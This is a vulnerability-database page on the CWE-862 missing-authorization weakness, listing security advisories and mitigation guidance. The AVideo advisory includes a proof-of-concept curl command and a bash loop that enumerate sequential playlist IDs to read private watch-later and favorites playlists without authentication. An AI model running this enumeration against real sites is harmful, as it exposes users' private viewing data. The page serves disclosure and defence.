Common Weakness Enumeration

CWE-862

Allowed-with-Review

Missing Authorization

Abstraction: Class · Status: Incomplete

The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

14566 vulnerabilities reference this CWE, most recent first.

GHSA-75QQ-68M8-PVFR

Vulnerability from github – Published: 2026-03-26 18:05 – Updated: 2026-03-27 21:37
VLAI
Summary
AVideo: Unauthenticated IDOR in playlistsVideos.json.php Exposes Private Playlist Contents
Details

Summary

The objects/playlistsVideos.json.php endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including watch_later and favorite types) are correctly hidden from listing endpoints via playlistsFromUser.json.php, but their contents are directly accessible through this endpoint by providing the sequential integer playlists_id parameter.

Details

The endpoint at objects/playlistsVideos.json.php accepts a playlists_id parameter and directly calls PlayList::getVideosFromPlaylist() with no ownership or visibility validation:

// objects/playlistsVideos.json.php:24-28
if (empty($_REQUEST['playlists_id'])) {
    die('Play List can not be empty');
}
require_once './playlist.php';
$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);

The getVideosFromPlaylist() method at objects/playlist.php:588 performs a SQL query joining playlists_has_videos, videos, and users tables with no authorization filter:

// objects/playlist.php:592-597
$sql = "SELECT v.*, p.*,v.created as cre, p.`order` as video_order  "
    . " FROM  playlists_has_videos p "
    . " LEFT JOIN videos as v ON videos_id = v.id "
    . " LEFT JOIN users u ON u.id = v.users_id "
    . " WHERE playlists_id = ? AND v.status != 'i' ";

In contrast, the listing endpoint playlistsFromUser.json.php correctly enforces visibility at lines 23-27:

// objects/playlistsFromUser.json.php:23-27
$publicOnly = true;
if (User::isLogged() && (User::getId() == $requestedUserId || User::isAdmin())) {
    $publicOnly = false;
}
$row = PlayList::getAllFromUser($requestedUserId, $publicOnly);

This creates a bypass: even though private playlists are hidden from listing, their contents are fully exposed via the videos endpoint. Playlist IDs are sequential integers, making enumeration trivial. The .htaccess rewrite at line 356 maps the clean URL playListsVideos.json to this endpoint.

PoC

Step 1: Enumerate playlist contents without authentication

# No cookies or auth headers needed. Increment playlists_id to enumerate.
curl -s "http://TARGET/objects/playlistsVideos.json.php?playlists_id=1" | python3 -m json.tool

Expected: Returns full video metadata array for playlist ID 1, including video titles, filenames, URLs, user info, comments, and subscriber counts.

Step 2: Enumerate private playlists (watch_later, favorite)

# Iterate through sequential IDs to find private playlists
for i in $(seq 1 50); do
  result=$(curl -s "http://TARGET/objects/playlistsVideos.json.php?playlists_id=$i")
  count=$(echo "$result" | python3 -c "import sys,json; print(len(json.load(sys.stdin)))" 2>/dev/null)
  if [ "$count" != "0" ] && [ -n "$count" ]; then
    echo "Playlist $i: $count videos"
  fi
done

Step 3: Confirm the listing endpoint correctly hides private playlists

# This correctly returns only public playlists for user 1
curl -s "http://TARGET/objects/playlistsFromUser.json.php?users_id=1" | python3 -m json.tool
# Compare: playlistsVideos.json.php returns contents of ALL playlists including private ones

Impact

An unauthenticated attacker can:

  • Enumerate all users' watch history by accessing watch_later playlist contents
  • Enumerate all users' favorites by accessing favorite playlist contents
  • Access unlisted/private custom playlists that were intentionally hidden from public view
  • Harvest video metadata including filenames, URLs, user information, and comments for videos in private playlists

This is a privacy violation that exposes user viewing habits and content preferences. The sequential integer IDs make bulk enumeration straightforward.

Recommended Fix

Add authorization checks to objects/playlistsVideos.json.php before returning playlist contents:

// objects/playlistsVideos.json.php — add after line 27, before getVideosFromPlaylist()
require_once $global['systemRootPath'] . 'plugin/PlayLists/PlayLists.php';

$pl = new PlayList($_REQUEST['playlists_id']);
$plStatus = $pl->getStatus();

// Public playlists are accessible to everyone
if ($plStatus !== 'public') {
    // Private, unlisted, watch_later, and favorite playlists require ownership or admin
    if (!User::isLogged() || (User::getId() != $pl->getUsers_id() && !User::isAdmin())) {
        header('HTTP/1.1 403 Forbidden');
        die(json_encode(['error' => 'You do not have permission to view this playlist']));
    }
}

$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33759"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T18:05:40Z",
    "nvd_published_at": "2026-03-27T15:16:58Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `objects/playlistsVideos.json.php` endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including `watch_later` and `favorite` types) are correctly hidden from listing endpoints via `playlistsFromUser.json.php`, but their contents are directly accessible through this endpoint by providing the sequential integer `playlists_id` parameter.\n\n## Details\n\nThe endpoint at `objects/playlistsVideos.json.php` accepts a `playlists_id` parameter and directly calls `PlayList::getVideosFromPlaylist()` with no ownership or visibility validation:\n\n```php\n// objects/playlistsVideos.json.php:24-28\nif (empty($_REQUEST[\u0027playlists_id\u0027])) {\n    die(\u0027Play List can not be empty\u0027);\n}\nrequire_once \u0027./playlist.php\u0027;\n$videos = PlayList::getVideosFromPlaylist($_REQUEST[\u0027playlists_id\u0027]);\n```\n\nThe `getVideosFromPlaylist()` method at `objects/playlist.php:588` performs a SQL query joining `playlists_has_videos`, `videos`, and `users` tables with no authorization filter:\n\n```php\n// objects/playlist.php:592-597\n$sql = \"SELECT v.*, p.*,v.created as cre, p.`order` as video_order  \"\n    . \" FROM  playlists_has_videos p \"\n    . \" LEFT JOIN videos as v ON videos_id = v.id \"\n    . \" LEFT JOIN users u ON u.id = v.users_id \"\n    . \" WHERE playlists_id = ? AND v.status != \u0027i\u0027 \";\n```\n\nIn contrast, the listing endpoint `playlistsFromUser.json.php` correctly enforces visibility at lines 23-27:\n\n```php\n// objects/playlistsFromUser.json.php:23-27\n$publicOnly = true;\nif (User::isLogged() \u0026\u0026 (User::getId() == $requestedUserId || User::isAdmin())) {\n    $publicOnly = false;\n}\n$row = PlayList::getAllFromUser($requestedUserId, $publicOnly);\n```\n\nThis creates a bypass: even though private playlists are hidden from listing, their contents are fully exposed via the videos endpoint. Playlist IDs are sequential integers, making enumeration trivial. The `.htaccess` rewrite at line 356 maps the clean URL `playListsVideos.json` to this endpoint.\n\n## PoC\n\n**Step 1: Enumerate playlist contents without authentication**\n\n```bash\n# No cookies or auth headers needed. Increment playlists_id to enumerate.\ncurl -s \"http://TARGET/objects/playlistsVideos.json.php?playlists_id=1\" | python3 -m json.tool\n```\n\nExpected: Returns full video metadata array for playlist ID 1, including video titles, filenames, URLs, user info, comments, and subscriber counts.\n\n**Step 2: Enumerate private playlists (watch_later, favorite)**\n\n```bash\n# Iterate through sequential IDs to find private playlists\nfor i in $(seq 1 50); do\n  result=$(curl -s \"http://TARGET/objects/playlistsVideos.json.php?playlists_id=$i\")\n  count=$(echo \"$result\" | python3 -c \"import sys,json; print(len(json.load(sys.stdin)))\" 2\u003e/dev/null)\n  if [ \"$count\" != \"0\" ] \u0026\u0026 [ -n \"$count\" ]; then\n    echo \"Playlist $i: $count videos\"\n  fi\ndone\n```\n\n**Step 3: Confirm the listing endpoint correctly hides private playlists**\n\n```bash\n# This correctly returns only public playlists for user 1\ncurl -s \"http://TARGET/objects/playlistsFromUser.json.php?users_id=1\" | python3 -m json.tool\n# Compare: playlistsVideos.json.php returns contents of ALL playlists including private ones\n```\n\n## Impact\n\nAn unauthenticated attacker can:\n\n- **Enumerate all users\u0027 watch history** by accessing `watch_later` playlist contents\n- **Enumerate all users\u0027 favorites** by accessing `favorite` playlist contents\n- **Access unlisted/private custom playlists** that were intentionally hidden from public view\n- **Harvest video metadata** including filenames, URLs, user information, and comments for videos in private playlists\n\nThis is a privacy violation that exposes user viewing habits and content preferences. The sequential integer IDs make bulk enumeration straightforward.\n\n## Recommended Fix\n\nAdd authorization checks to `objects/playlistsVideos.json.php` before returning playlist contents:\n\n```php\n// objects/playlistsVideos.json.php \u2014 add after line 27, before getVideosFromPlaylist()\nrequire_once $global[\u0027systemRootPath\u0027] . \u0027plugin/PlayLists/PlayLists.php\u0027;\n\n$pl = new PlayList($_REQUEST[\u0027playlists_id\u0027]);\n$plStatus = $pl-\u003egetStatus();\n\n// Public playlists are accessible to everyone\nif ($plStatus !== \u0027public\u0027) {\n    // Private, unlisted, watch_later, and favorite playlists require ownership or admin\n    if (!User::isLogged() || (User::getId() != $pl-\u003egetUsers_id() \u0026\u0026 !User::isAdmin())) {\n        header(\u0027HTTP/1.1 403 Forbidden\u0027);\n        die(json_encode([\u0027error\u0027 =\u003e \u0027You do not have permission to view this playlist\u0027]));\n    }\n}\n\n$videos = PlayList::getVideosFromPlaylist($_REQUEST[\u0027playlists_id\u0027]);\n```",
  "id": "GHSA-75qq-68m8-pvfr",
  "modified": "2026-03-27T21:37:49Z",
  "published": "2026-03-26T18:05:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-75qq-68m8-pvfr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33759"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/bb716fbece656c9fe39784f11e4e822b5867f1ca"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Unauthenticated IDOR in playlistsVideos.json.php Exposes Private Playlist Contents"
}

GHSA-75QX-X3G4-9GGX

Vulnerability from github – Published: 2024-05-17 09:31 – Updated: 2024-05-17 09:31
VLAI
Details

Missing Authorization vulnerability in Imran Sayed Headless CMS.This issue affects Headless CMS: from n/a through 2.0.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-34186"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-17T07:15:55Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in Imran Sayed Headless CMS.This issue affects Headless CMS: from n/a through 2.0.3.",
  "id": "GHSA-75qx-x3g4-9ggx",
  "modified": "2024-05-17T09:31:00Z",
  "published": "2024-05-17T09:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34186"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/headless-cms/wordpress-headless-cms-plugin-2-0-3-broken-authentication-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-75WM-Q5M3-C399

Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-27 21:31
VLAI
Details

Missing Authorization vulnerability in WPXPO PostX ultimate-post allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PostX: from n/a through <= 5.0.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-69313"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-22T17:16:26Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in WPXPO PostX ultimate-post allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PostX: from n/a through \u003c= 5.0.3.",
  "id": "GHSA-75wm-q5m3-c399",
  "modified": "2026-01-27T21:31:42Z",
  "published": "2026-01-22T18:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69313"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-5-0-3-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7624-MW4M-X28H

Vulnerability from github – Published: 2025-03-05 12:31 – Updated: 2025-03-05 12:31
VLAI
Details

The WooMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'template_delete_saved' function in all versions up to, and including, 3.0.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject SQL into an existing post deletion query.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-13747"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-05T10:15:14Z",
    "severity": "MODERATE"
  },
  "details": "The WooMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the \u0027template_delete_saved\u0027 function in all versions up to, and including, 3.0.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject SQL into an existing post deletion query.",
  "id": "GHSA-7624-mw4m-x28h",
  "modified": "2025-03-05T12:31:10Z",
  "published": "2025-03-05T12:31:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13747"
    },
    {
      "type": "WEB",
      "url": "https://codecanyon.net/item/email-customizer-for-woocommerce-with-drag-drop-builder-woo-email-editor/22400984"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e74e1a7c-4fe6-4041-8c4c-13389dacb9db?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-762Q-X4W4-FX33

Vulnerability from github – Published: 2024-11-01 15:31 – Updated: 2026-04-01 18:32
VLAI
Details

Missing Authorization vulnerability in Zaytech Smart Online Order for Clover allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Smart Online Order for Clover: from n/a through 1.5.6.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-43254"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-01T15:15:43Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in Zaytech Smart Online Order for Clover allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Smart Online Order for Clover: from n/a through 1.5.6.",
  "id": "GHSA-762q-x4w4-fx33",
  "modified": "2026-04-01T18:32:16Z",
  "published": "2024-11-01T15:31:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43254"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/clover-online-orders/vulnerability/wordpress-smart-online-order-for-clover-plugin-1-5-6-broken-access-control-vulnerability-2?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/clover-online-orders/wordpress-smart-online-order-for-clover-plugin-1-5-6-broken-access-control-vulnerability-2?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7635-6274-7QJR

Vulnerability from github – Published: 2024-12-09 15:31 – Updated: 2026-04-23 15:33
VLAI
Details

Missing Authorization vulnerability in WPSAAD Alt Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Alt Manager: from n/a through 1.6.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-50373"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-09T13:15:38Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in WPSAAD Alt Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Alt Manager: from n/a through 1.6.1.",
  "id": "GHSA-7635-6274-7qjr",
  "modified": "2026-04-23T15:33:39Z",
  "published": "2024-12-09T15:31:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50373"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/alt-manager/vulnerability/wordpress-alt-manager-plugin-1-5-9-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7649-6HF2-RXRP

Vulnerability from github – Published: 2026-06-25 15:32 – Updated: 2026-06-25 15:32
VLAI
Details

Missing Authorization vulnerability in Royal Plugins Royal MCP allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Royal MCP: from n/a through 1.4.25.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-54842"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-25T14:16:48Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in Royal Plugins Royal MCP allows Exploiting Incorrectly Configured Access Control Security Levels.\n\nThis issue affects Royal MCP: from n/a through 1.4.25.",
  "id": "GHSA-7649-6hf2-rxrp",
  "modified": "2026-06-25T15:32:01Z",
  "published": "2026-06-25T15:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54842"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/royal-mcp/vulnerability/wordpress-royal-mcp-plugin-1-4-25-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-764J-MG8F-RQWV

Vulnerability from github – Published: 2023-12-04 03:30 – Updated: 2023-12-07 15:30
VLAI
Details

In firewall service, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-42706"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-04T01:15:10Z",
    "severity": "MODERATE"
  },
  "details": "In firewall service, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed",
  "id": "GHSA-764j-mg8f-rqwv",
  "modified": "2023-12-07T15:30:37Z",
  "published": "2023-12-04T03:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42706"
    },
    {
      "type": "WEB",
      "url": "https://www.unisoc.com/en_us/secy/announcementDetail/https://www.unisoc.com/en_us/secy/announcementDetail/1731138365803266049"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-764X-99Q3-75X3

Vulnerability from github – Published: 2024-06-06 03:30 – Updated: 2026-04-08 18:33
VLAI
Details

The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_settings' function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-5324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-06T02:15:54Z",
    "severity": "HIGH"
  },
  "details": "The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \u0027import_settings\u0027 function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.",
  "id": "GHSA-764x-99q3-75x3",
  "modified": "2026-04-08T18:33:19Z",
  "published": "2024-06-06T03:30:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5324"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/easy-login-woocommerce/trunk/includes/xoo-framework/admin/class-xoo-admin-settings.php#L83"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/side-cart-woocommerce/trunk/includes/xoo-framework/admin/class-xoo-admin-settings.php#L83"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3093994"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3111541"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3115392/mobile-login-woocommerce/trunk?contextall=1\u0026old=3084918\u0026old_path=%2Fmobile-login-woocommerce%2Ftrunk"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3117332"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7682-CRGJ-3P5H

Vulnerability from github – Published: 2024-06-10 09:31 – Updated: 2024-06-10 09:31
VLAI
Details

Missing Authorization vulnerability in Avirtum iPages Flipbook.This issue affects iPages Flipbook: from n/a through 1.5.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-4744"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-10T08:15:51Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in Avirtum iPages Flipbook.This issue affects iPages Flipbook: from n/a through 1.5.1.",
  "id": "GHSA-7682-crgj-3p5h",
  "modified": "2024-06-10T09:31:06Z",
  "published": "2024-06-10T09:31:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4744"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/ipages-flipbook/wordpress-ipages-flipbook-plugin-1-5-1-broken-access-control-vulnerability-2?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.